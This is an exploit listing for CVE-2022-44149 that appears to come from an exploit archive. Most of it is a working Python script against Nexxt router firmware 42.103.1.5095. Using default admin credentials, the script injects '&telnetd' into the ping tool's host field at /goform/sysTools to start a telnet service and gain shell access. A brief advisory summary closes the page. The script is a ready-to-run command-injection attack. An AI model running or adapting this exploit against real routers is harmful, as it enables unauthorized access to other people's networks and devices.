Headline
Nexxt Router Firmware 42.103.1.5095 Remote Code Execution
Nexxt Router Firmware version 42.103.1.5095 authenticated remote code execution exploit that enables telnetd.
# Exploit Title: Nexxt Router Firmware 42.103.1.5095 - Remote Code Execution (RCE) (Authenticated)# Date: 19/10/2022# Exploit Author: Yerodin Richards# Vendor Homepage: https://www.nexxtsolutions.com/# Version: 42.103.1.5095# Tested on: ARN02304U8# CVE : CVE-2022-44149import requestsimport base64router_host = "http://192.168.1.1"username = "admin"password = "admin"def main(): send_payload("&telnetd") print("connect to router using: `telnet "+router_host.split("//")[1]+ "` using known credentials") passdef gen_header(u, p): return base64.b64encode(f"{u}:{p}".encode("ascii")).decode("ascii")def send_payload(payload): url = router_host+"/goform/sysTools" headers = {"Authorization": "Basic {}".format(gen_header(username, password))} params = {"tool":"0", "pingCount":"4", "host": payload, "sumbit": "OK"} requests.post(url, headers=headers, data=params)if __name__ == '__main__': main()Related news
CVE-2022-44149: Nexxt Router Firmware 42.103.1.5095 Remote Code Execution ≈ Packet Storm
The web service on Nexxt Amp300 ARN02304U8 42.103.1.5095 devices allows remote OS command execution by placing &telnetd in the JSON host field to the ping feature of the goform/sysTools component. Authentication is required.